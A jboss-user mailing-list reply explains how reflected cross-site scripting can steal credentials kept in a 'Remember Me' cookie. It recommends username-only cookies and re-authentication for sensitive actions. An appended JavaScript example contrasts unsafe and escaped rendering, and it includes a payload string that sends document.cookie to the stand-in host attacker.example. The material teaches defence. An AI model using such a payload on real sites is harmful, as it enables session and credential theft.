From a security perspective, this is not a good idea. I can steal your username and password from the cookie with a bit of JavaScript. The only requirement for that is that somewhere in the web application, user input is printed on the webpage unfiltered (e.g. on a registration screen, there is a "The address $email is not valid." error message and $email comes from a form field).

I make you click on a link I prepared and redirect you with a POST and some malicious payload to the vulnerable registration form. My POST enters JavaScript code into the form, which is then printed onto the webpage in the error message. In that JavaScript, I read your cookie and send it to my server. This is known as cross-site scripting and there are many variations.

Short story: Do not trust the client, do not store sensitive information on the client. The best "Remember Me" feature is something similar to what Amazon is using: a username cookie is stored on the client, and the web application welcomes the user with his real name and also shows the remembered shopping basket. However, any sensitive operation (editing the shopping basket, buying stuff) requires re-authentication. This combined with an application audit for XSS holes is a good strategy.

View the original post : http://www.jboss.com/index.html?module=bb&op=viewtopic&p=4018114#4018114
Reply to the post : http://www.jboss.com/index.html?module=bb&op=posting&mode=reply&p=4018114

_______________________________________________
jboss-user mailing list
[email protected]
https://lists.jboss.org/mailman/listinfo/jboss-user
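The following is an added example, not code from the original post or from JBoss: it reproduces the reflected-XSS pattern the reply describes (an error message that interpolates a submitted $email value into HTML unescaped), shows the one-line fix, and shows a "Remember Me" cookie that carries only a non-secret username. The function names (renderErrorUnsafe, renderErrorSafe, escapeHtml, containsScriptTag, rememberMeCookie), the attacker host attacker.example and the payload string are all hypothetical; the HttpOnly attribute is an extra mitigation beyond what the post mentions, added so that even a successful injection cannot read the cookie from script.

```javascript
// Added example (not from the original post). Hypothetical helper names throughout.

// Minimal HTML escaping for text placed between tags or inside attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the submitted address is echoed into the page as-is, so a value
// containing markup becomes part of the document (the "$email" case in the post).
function renderErrorUnsafe(email) {
  return `<p class="error">The address ${email} is not valid.</p>`;
}

// Fixed: escape before interpolating into markup; the browser shows the
// attacker's text literally instead of executing it.
function renderErrorSafe(email) {
  return `<p class="error">The address ${escapeHtml(email)} is not valid.</p>`;
}

// Constructed attacker payload: what the POST body's email field would carry.
// It ships document.cookie to a server the attacker controls (hypothetical host).
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?" +' +
  'encodeURIComponent(document.cookie)</script>';

// Crude audit check for rendered output: is there an unescaped <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// "Remember Me" done the way the post recommends: the cookie holds only the
// username (nothing secret), and sensitive actions re-authenticate elsewhere.
// HttpOnly/Secure/SameSite are added hardening so script cannot read the cookie.
function rememberMeCookie(username) {
  return `rememberedUser=${encodeURIComponent(username)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Stand-alone demonstration.
console.log("unsafe page has script tag:", containsScriptTag(renderErrorUnsafe(PAYLOAD)));
console.log("safe page has script tag:  ", containsScriptTag(renderErrorSafe(PAYLOAD)));
console.log(rememberMeCookie("bob smith"));
```

Escaping at the point of output is the general fix; the audit the post calls for is a search for every place where request data reaches a template or a string concatenated into HTML without passing through something like escapeHtml.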
